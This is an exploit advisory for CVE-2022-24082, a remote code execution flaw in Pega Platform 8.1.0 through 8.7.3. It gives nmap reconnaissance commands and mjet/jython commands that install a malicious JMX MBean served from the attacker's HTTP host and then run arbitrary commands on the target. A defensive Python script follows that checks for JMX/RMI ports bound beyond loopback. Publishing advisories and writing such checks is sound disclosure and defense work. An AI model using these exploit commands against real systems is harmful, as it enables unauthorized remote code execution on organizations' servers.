Pega Platform 8.7.3 Remote Code Execution

2022.10.24
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Pega Platform 8.1.0 (and higher) Remote Code Execution
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.7.3
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082

;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>

;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1:<PORT>)
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>

;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython

;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666

;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig"

;More details:
https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316
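
A host-side check for the condition noted above (the registry advertises @127.0.0.1:<PORT>, yet the port listens on the network), added here as an example and not part of the original advisory or of mjet. It assumes socket data in the column layout of `ss -ltnH` from iproute2; the function names, the sample dump line and port 41234 are constructed for illustration.

```python
import ipaddress
import re

# Token form quoted in the write-up: @127.0.0.1:<PORT>
ENDPOINT_RE = re.compile(r"@127\.0\.0\.1:(\d{1,5})\b")

def advertised_loopback_ports(registry_dump):
    """Ports the registry dump advertises as loopback endpoints."""
    return {int(p) for p in ENDPOINT_RE.findall(registry_dump)}

def parse_local(field):
    """Split an ss 'Local Address:Port' field into (host, port)."""
    host, _, port = field.rpartition(":")
    host = host.split("%")[0].strip("[]")  # drop %iface scope and IPv6 brackets
    return host, int(port)

def is_loopback_only(host):
    if host == "*":  # wildcard bind: reachable on every interface
        return False
    addr = ipaddress.ip_address(host)
    addr = getattr(addr, "ipv4_mapped", None) or addr  # ::ffff:127.0.0.1
    return addr.is_loopback

def audit(registry_dump, ss_output, registry_port=9999):
    """Return (host, port) for JMX/RMI listeners bound beyond loopback."""
    ports = advertised_loopback_ports(registry_dump) | {registry_port}
    findings = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue
        host, port = parse_local(cols[3])
        if port in ports and not is_loopback_only(host):
            findings.append((host, port))
    return findings

# Constructed sample input (not captured from a real system).
SAMPLE_DUMP = "jmxrmi @127.0.0.1:41234"
SAMPLE_SS = """\
LISTEN 0 50  *:9999          *:*
LISTEN 0 50  *:41234         *:*
LISTEN 0 128 127.0.0.1:5432  0.0.0.0:*
LISTEN 0 128 [::1]:8005      [::]:*
"""

if __name__ == "__main__":
    for host, port in audit(SAMPLE_DUMP, SAMPLE_SS):
        print(f"port {port} is bound to {host}, not loopback: restrict or firewall it")
```

Any finding means the JMX/RMI port is reachable from other hosts unless a firewall blocks it, regardless of the loopback address shown in the registry dump.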


Copyright 2022, cxsecurity.com

 
